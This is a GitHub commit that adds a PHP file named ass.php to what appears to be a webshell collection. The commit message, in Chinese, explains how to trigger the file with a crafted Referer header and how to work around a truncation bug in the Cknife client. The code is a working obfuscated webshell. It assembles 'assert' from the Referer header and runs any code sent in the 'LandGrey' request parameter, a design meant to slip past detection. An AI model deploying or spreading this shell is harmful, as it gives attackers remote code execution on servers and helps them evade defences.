Create ass.php

请求时,设置Referer头,后面以”ass****”结尾即可,比如:Referer: http://www.target.com/ass.php。
在使用Cknife时,注意软件实现有缺陷,会从第二个”:”处截断,可改成Referer: http%3a//www.target.com/ass.php
from : http://alin.run/2020/08/04/php-webshell-bypass/
This commit is contained in:
tennc 2020-09-03 21:00:49 +08:00 committed by GitHub
parent 9fd273a5a5
commit 719eb9131d
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

9
php/ass.php Normal file
View file

@ -0,0 +1,9 @@
<?php
/**
* Noticed: (PHP 5 >= 5.3.0, PHP 7)
*
*/
$password = "LandGrey";
$wx = substr($_SERVER["HTTP_REFERER"],-7,-4);
forward_static_call_array($wx."ert", array($_REQUEST[$password]));
?>